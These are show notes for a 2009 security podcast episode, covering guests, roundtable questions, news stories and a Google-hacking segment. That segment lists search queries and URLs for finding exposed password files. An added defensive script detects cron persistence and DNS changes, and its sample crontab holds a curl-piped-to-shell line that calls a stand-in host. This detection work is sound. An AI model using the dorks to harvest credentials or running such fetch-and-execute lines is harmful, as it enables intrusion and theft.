Episode150

From Paul's Security Weekly

Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Welcome To PaulDotCom's Episode 150 12 Hour Podcast Extravaganza!

  • Call in information: Skype ID = "pauldotcom"
  • IRC - #pauldotcom | irc.freenode.net
  • Email questions: psw@pauldotcom.com

Introduction, Announcements, & Shameless Plugs (12:00PM - 12:30PM) (Download Audio Here)

  • Sponsors - We've got a deal with SANS! Go to http://pauldotcom.com/sans and sign up for fabulous training and certification! We've also got a deal with Syngress Publishing: go to www.syngress.com and use the discount code "PaulDotCom" for 20% off all security titles!

Celebrating PaulDotCom Security Weekly - Episode 150 - April 30, 2009

We're kicking off the 12 hour podcast with some announcements, administrivia, and other musings.

  • April 30th - PaulDotCom Security Weekly Special Edition - Episode 150 - A historic milestone to beer drinkers everywhere! We start recording/streaming at noontime (EDT) and don't stop until midnight! Call lines will be open to share your darkest secrets with 30,000 of your closest friends! Everyone should tune in and participate in the big event!
  • We pour a glass to celebrate winning the Security Bloggers Meetup/RSA Conference's "Social Security Awards" - Best Security Podcast category. Contrary to its name (it has nothing to do with our senility), the award recognizes bloggers and podcasts for outstanding work. We weathered the 450+ nominations, a panel of judges from CSO Magazine, Washington Post, Forrester Research, Dark Reading and TechTarget, and STILL managed to pull the win from behind our beer glasses! Thank you to all our listeners for their nominations and for everyone's hard work!

Episode Media

mp3 pt 1

mp3 pt 2

Special Guest: Lenny Zeltser (12:30PM-1:00PM) (Download Audio Here)

Much of the security advice under the "best practices" umbrella seems to assume that the company is interested in having strong security or in being a high performer of IT/security practices. Yet most companies (e.g., SMBs) don't care about high performance: they just want to survive and conduct business and to have security that's just good enough.


So, what advice should we offer to companies who will never be proactive about security, who will never implement defense-in-depth, and who maybe don't need to worry about these issues? That's why I've been creating one-page cheat-sheets to assist companies who haven't prepared, yet are stuck in a tough spot.

Here are a few pointers to the write-ups I mentioned:

Security is about outcomes, not about process

SWOT Matrix for Describing Security Posture

How to Suck at Information Security (Paul's Favorite)


Some additional links for better "selling" security to non-security folks:

How to Be Heard in IT Security and Business

Three Laws of Behavior Dynamics for Information Security

Elevator Pitch for Explaining Security Risks to Executives

Listener Call-In & Feedback (1:00PM-3:30PM) (Download Audio Here)

Call into the show and ask us a question! Also, if you've sent us email, we'll be talking about it here. We will also use this timeslot to have a free form discussion about:

  1. Security Certifications - Are they worth it? Which ones have helped your career?
  2. Favorite Operating System - Which Linux distribution do you like the best and why? Do you like Windows, care to defend it?
  3. Wireless Security - Do we have any? What can we do to protect our wireless networks? Also, is it okay to use your neighbor's Wi-Fi?
  4. Do as I say -- not as I do - Do security folks send mixed messages to non-security folks by using tools like Twitter, FaceBook, etc?
  5. Emacs vs. VIM - Nuff said.
  6. Pirates vs. Ninjas - Which side do your loyalties lean toward?

Break 3:30PM-4:00PM

  • Setup for the next segment
  • Eat something
  • Blow some stuff up

Roundtable Discussion - PCI Compliance: Good Luck or Good Riddance? (4:00PM-5:00PM) (Download Audio Here)

Panelists:

Questions For Discussion:

  • What elements of PCI really help organizations protect sensitive information?
  • I have been certified as PCI compliant, I'm secure right?
  • Does PCI do more harm than good by giving people a false sense of security?
  • If you could make one improvement to PCI, what would it be?

More Questions From Anton:

  • Prescriptive compliance vs outcome-based compliance
  • Who do you fear more, hacker or auditor?
  • Does risk belong in compliance?
  • Where is value in compliance - in prescribing what to do or in motivating people to do SOMETHING?

Roundtable Discussion - Vulnerability Disclosure: Who Pwns Your Bugs? (5:00PM-6:00PM) (Download Audio Here)

Panelists:

Questions:

  • Should vendors pay researchers for the vulnerabilities they find?
  • Why don't all vendors employ a vulnerability researcher for all their products? Should they be required to?
  • Should there be a penalty to vendors for insecure software?
  • Should all bugs be free, open, and disclosed to the public?
  • If you find a bug, why not just keep it to yourself, build a botnet, rent out the botnet for large sums of money, then move to a warm sunny place?

Storytime With Bob & PaulDotCom (6:00PM-7:00PM) (Download Audio Here)

Join us with special guests "Bob" and the triumphant return of none other than "Twitchy"! If all goes well Twitchy will be live in the studio!!!

Break (7:00PM-7:30PM)

  • Eat some more food
  • Blow some more stuff up

Episode 150 (7:30PM-10:00PM) (Download Audio Here)

PaulDotCom Security Weekly - Episode 150 - April 30, 2009

Announcements

  • Training event in Rhode Island! SANS@Home/Community - SEC517 Cutting-Edge Hacking Techniques - May 11 & 13th 7-10PM use the discount code "PaulDotCom" for a 10% savings - Click here to register now!
  • New sponsor announced (in addition to Cenzic) - This one will be *very* beneficial to the listeners, especially those who like to read...

Special Feature Interview: Stephen Northcutt

Stephen Northcutt - Ex Officio: Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu. Stephen is author/coauthor of Incident Handling Step-by-Step, Intrusion Signatures and Analysis, Inside Network Perimeter Security 2nd Edition, IT Ethics Handbook, SANS Security Essentials, SANS Security Leadership Essentials and Network Intrusion Detection 3rd edition. He was the original author of the Shadow Intrusion Detection system before accepting the position of Chief for Information Warfare at the Ballistic Missile Defense Organization. Stephen is a graduate of Mary Washington College. Before entering the field of computer security, he worked as a Navy helicopter search and rescue crewman, white water raft guide, chef, martial arts instructor, cartographer, and network designer.

Questions:

  1. How did you get your start in information security?
  2. How did you get involved with SANS and how did it become the organization it is today?
  3. Tell us a little about your course, why is it so important for managers to know about security and what kinds of things do they learn in your course?
  4. In the book Geekonomics, David Rice contends that nothing will improve until software and hardware vendors are held accountable for their bugs and vulnerabilities. However, nothing seems to be happening in this arena. What will it take for accountability to land on the shoulders of those who can fix this situation?
  5. While few were expecting regulatory mandates to make InfoSec a harmonious peace filled profession, only the most pessimistic were predicting what actually came to pass - very little change, and resistance at every step of the way. We've seen breaches get bigger, and bigger, but the reaction from the business sector and the public at large has mainly been yawns and heavy punitive damages against the worst offenders while everyone else who's doing the same thing gets off without even warnings. What will it take for the business community to take security seriously and act accordingly?
  6. What advice would you give a young Stephen Northcutt just starting out in his career? Some would say that certifications are just a piece of paper; anyone can write a paper (or get someone to write their paper, or copy and paste from the Internet). What do you say to these people, and where should certification fall in your career planning?
  7. Can you share with us some of your advice for traveling? How has one had to change their traveling habits in the face of terrorism and bio-outbreaks such as the swine flu?
  8. When SANS has an Incident (attempt), what do they do/who do they call/what have they seen?
  9. In your opinion, what's the one thing in the Information Security industry that isn't talked about enough? What's the 800 pound gorilla that everyone's trying desperately to avoid mentioning? To further mix metaphors, which emperor has no clothes?
  10. Please list some things that security geeks can do to better sell security to their business? It takes two to tango, and it seems that InfoSec folks aren't getting the funding they need because they can't articulate their needs appropriately. How can we as security professionals raise awareness in an actionable manner?
  11. What's the top 3 things companies can do for their security bottom line?
  12. What are your favorite gadgets/tech toys? lilikoi, mangos, breadfruit, or bananas? What's your favorite fruit to grow on your farm? Favorite beer?

Tech Segment

Google Hacking: Even More

We're looking to take your Google hacking to the next level. We love Google because of the things that it can find and give to us. The trick, of course, is that we need to figure out how to make Google give up the goods.

I put the call out for folks to share their Google fu. This is what I got back:

Viss:

"filetype:cfg password" Turns up stuff like this: https://www-rp.lip6.fr/trac/pfres/attachment/wiki/Entreprise2Gateway1/config_J2300_2007-05-21.cfg

"filetype:xls password" https://gforge.nci.nih.gov/svnroot/caarray2/trunk/qa/docs/Test%20Cases/Regression_Tests/TC2_Login_use_case.xls

This one can even get better: “login: *” “password= *” filetype:xls

returns this: www.adinternational.be/Word/Recruitment_rates.xls


woah: http://bitsnbytes.org/KnowledgeBase/ILS_DC_Passwords/Old%20Password%20List.xls


Montejam: site:google.com filetype:doc "draft" + architecture

TimelessP: http://www.google.co.uk/codesearch?hl=en&lr=&q=^\bsystem\(.*\%24_get.*%24+lang%3Aphp+-escapeshellarg+-escapeshellcmd&sbtn=Search

Nice, gotta love using Google Code Search to find vulnerabilities or programming errors.

Some of my favorites: http://www.google.com/search?q=intitle:%22Index+of%22+%22.htpasswd%22+%22htgroup%22++-intitle:%22dist%22+-apache+-htpasswd.c&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N


www.iabass.com/pics/Combined%20WLP%20.xls


intitle:index.of signons2.txt

intitle:index.of signons3.txt

http://fullloon.com/mnfan/2009-xfer/Cookies/Recent/New%20Folder/Application%20Data/Mozilla/Firefox/Profiles/default.ggs/signons3.txt


Stories For Discussion

  1. 2 more Adobe Reader vulns - [Larry] - Oh boy, is Adobe PDF the new target? Seems real effective for folks to let into their organizations, as they had been fairly innocuous. Looks like the way to neuter is to disable JavaScript in the PDF viewer... but really, who uses JavaScript in PDFs? Need to neuter at the source? Try Didier's PDFiD.
  2. Social Networking for Data Exfiltration - [Larry] - Really? Folks are posting sensitive internal docs and revealing internal structure to social networking sites? Now this I have to see. Sure, I can see other info, but not the smoking gun.
  3. Delicious for information gathering - [Larry] - Wow, search what everyone has bookmarked. Certainly there can be some interesting terms in URLs, such as usernames and passwords. Not to mention, how many folks bookmark internal resources.
  4. A tutorial for FOCA - [Larry] - Another neat tool for metadata analysis. A great complement to metagoofil. I've had a few issues with it, such as crashing with large scans, and to me the interface isn't intuitive. At that, the tool works really well on the analysis portion.
  5. Slaying One More Dragon, MS disables Autorun - [PaulDotCom] - Apparently the Conficker worm, among other threats, has forced MS to disable this feature. U3 still works though. I highly recommend people check out software like Device Lock.
  6. Screenshot tool with timestamps - [PaulDotCom] - This sounds great, I love screenshots. In my presentation for the Zen web cast I talked about this, how important screenshots are in your report. Sometimes it's the Win3k screensaver, and sometimes it's GOLD, like passwords on the screen, etc. Nice to have the timestamp too.
  7. Do we need AES-256? - [PaulDotCom] - I'll be honest, I didn't read this one all the way through, but if it's feasible, wouldn't you want the strongest encryption possible? Just because someone can't break it now doesn't mean someone won't in the future. Or, how about this: what if someone can break encryption now and just isn't telling anyone?
  8. When DoS is more than a DoS - SCTP remote exploit - [PaulDotCom] - SCTP is a layer 4 protocol, just like TCP; you probably haven't heard about it, or if you did, didn't pay much attention. However, did you know it's baked into most Linux kernels? Also, did you know that there is a remote exploit out there for it? Also, if you are a non-privileged user you can run services that support SCTP and then execute a remote exploit. Check out the withsctp command; it will run commands with SCTP support. Try xinetd, enable small services, and you are off to the races. Many popular tools don't yet support SCTP!
Zombie Stories (10:00PM-12:00AM) (Download Audio Here)

This section will be dedicated to discussing stories that we didn't have time for in other episodes.

We'll be joined for these by:

  • Bill (hevnsnt)
  • Trent (surbo)

Both are from i-hacked.com (blog: edge.i-hacked.com)

  1. The folly (or greatness) of national jurisdictions - [Mick] - Nothing new here, but can we keep at this forever? Yet another story of attackers hiding behind cloaked security. Until something is done about this, can we be nothing but defenders?
  2. XP support runs out... - [Larry] - Oh, this could get interesting. No more bug fixes in XP (security fixes, yes, until 2014), unless you pay for additional support. For 63% of all internet-connected computers... So, do you think that there will be some bugs that won't be classified as security fixes that can lead to getting you owned?
  3. All You Need Is FTP Account Credentials - [PaulDotCom] - Paul McCartney's web site got hacked. How'd they do it? They stole FTP credentials, logged into the site, and added some JavaScript to infect visitors. Sexy, eh? This is a battle I am familiar with. You can have the most secure web site in the world, written in vi even, with just straight HTML. However, it's only as secure as the web developer's credentials. For example, if the web admin logs in from home over FTP, it could be game over if their machine is infected by a bot, or there is another bot nearby with the ability to sniff that traffic, or someone gained access to network gear and sniffed traffic. You should be using SSH, with private/public key trusts, protected with passphrases. That STILL doesn't help the compromised admin/developer workstation, so in the end we come back to user education, policy, and the "softer" side of information security, which ironically is a lot harder to implement.
  4. CredCollect for Metasploit - [Larry] - It seems that there is a lot of development into plugins for Metasploit lately (maybe that's why they got shut down? :-)), and this one is no exception. How about some automation using Priv and Incognito to harvest credentials, stored in formats suitable for cracking later? My favorite line: "The utility of this plugin is best realized in medium to large scale engagements (read: beaucoup shellz) such as internal engagements or external phishing campaigns that result in multiple parallel sessions returning to the team at unpredicted rates and times." [PaulDotCom] - On credential collecting - I'd like to see this expanded to include applications that store things in the registry (like VNC), or other insecurities. For example, ever do a strings on your OS X keychain? It stores your iTunes share passwords in clear text. Nice, huh? This could then be stored in the database and compared to other passwords, or compare usernames. Ultimately it would be nice to keep track of which passwords have been tried on which systems and with which usernames.
  5. Just a few words on GhostNet - [Larry] - Ahh, the smell of monitoring governments with a botnet in the morning! Here's some great coverage on the tool used, Poison Ivy. Even more analysis and papers here.
  6. Checkpoint FW-1 PKI overflow - [Larry] - Interesting disclosure. Tested on a client site (where it apparently caused a crash, and no further testing was possible). Looks like very long HTTP headers caused the crash...
  7. Don't Install MacCinema - [PaulDotCom] - W00t, malware for OS X! Love it. The preinstall and postinstall scripts are obfuscated bash scripts that do evil stuff. Lots of command line kung fu in here! It actually makes entries in your crontab to run the malware. This is pretty easy to detect. Ultimately it downloads another script, which then changes your DNS servers. Pretty lame if you ask me; I would think that creating a kernel extension in OS X would be a MUCH better way to hide and change settings on the fly.
  8. OpenSSL 1.0.0 Beta! - [PaulDotCom] - Took them ten years, but they're finally reaching 1.0. I just thought that was funny :)
  9. Camera Refurb - [PaulDotCom] - Speaking of cameras, this is a pretty cool hardware hack to bring a camera back to life. Neat!
  10. Independent Attack Discoveries - [PaulDotCom] - Just when you thought that you found a 0day, it's not :) Recently Joanna found some problems related to an Intel caching bug, only to find out that others had discovered the bug in 2005. This speaks volumes towards disclosure: if you found a bug, others might have too, so vendors need to fix them!!!
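The MacCinema write-up says the installer persists through crontab and then swaps the DNS servers, and that this is "pretty easy to detect". The script below is an added example of that detection, not the malware's scripts and not a vendor signature: it parses crontab output and flags jobs that run from a temp directory, from a hidden directory under a home folder, or that pipe a download straight into an interpreter, and it diffs the resolv.conf nameservers against the ones you expect. The rules, the sample crontab and the sample resolv.conf are the author's constructed assumptions about what such an entry looks like.

```python
"""Detect the two persistence tricks described in the MacCinema story:
a crontab entry that keeps the payload alive, and swapped DNS servers.
Added example; the rules below are assumptions, not published signatures."""
import re

# Places a legitimate cron job has little business executing from.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/dev/shm/")
# ~/.something/ under a macOS or Linux home directory
HIDDEN_PATH_RE = re.compile(r"(?:^|/)(?:Users|home)/[^/\s]+/\.[^/\s]+/")
# curl/wget ... | sh  (download piped straight into an interpreter)
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh|perl|python)\b")


def cron_command(line):
    """Return the command part of a crontab line, or None for comments/blank."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):            # @reboot /path/cmd
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)         # m h dom mon dow command
    return parts[5] if len(parts) == 6 else None


def suspicious_cron_entries(crontab_text):
    """Return (crontab line, reason) pairs for entries matching a rule."""
    findings = []
    for line in crontab_text.splitlines():
        cmd = cron_command(line)
        if cmd is None:
            continue
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            findings.append((line.strip(), "runs from a temp directory"))
        if HIDDEN_PATH_RE.search(cmd):
            findings.append((line.strip(), "runs from a hidden directory in a home folder"))
        if PIPE_TO_SHELL_RE.search(cmd):
            findings.append((line.strip(), "pipes a download straight into an interpreter"))
    return findings


def changed_nameservers(resolv_conf_text, expected):
    """Nameservers present in resolv.conf that are not in the expected set."""
    expected = set(expected)
    seen = [parts[1] for parts in (l.split() for l in resolv_conf_text.splitlines())
            if len(parts) >= 2 and parts[0] == "nameserver"]
    return [ns for ns in seen if ns not in expected]


# Constructed samples: output of `crontab -l` for a user and a resolv.conf.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/5 * * * * /private/tmp/.upd/update.sh >/dev/null 2>&1
@reboot /Users/alice/.macc/run.pl
*/10 * * * * curl -s http://dns-changer.invalid/x | sh
"""
SAMPLE_RESOLV = "search corp.example\nnameserver 10.0.0.1\nnameserver 203.0.113.53\n"
EXPECTED_DNS = ["10.0.0.1", "10.0.0.2"]

if __name__ == "__main__":
    for entry, reason in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron: {reason}: {entry}")
    for ns in changed_nameservers(SAMPLE_RESOLV, EXPECTED_DNS):
        print(f"dns: unexpected nameserver {ns}")
```

On a real host feed it `crontab -l` for every user plus the system crontabs in /etc, and on OS X also check the DNS setting the GUI actually uses (`scutil --dns` or `networksetup -getdnsservers`), since a DNS changer may not touch /etc/resolv.conf at all.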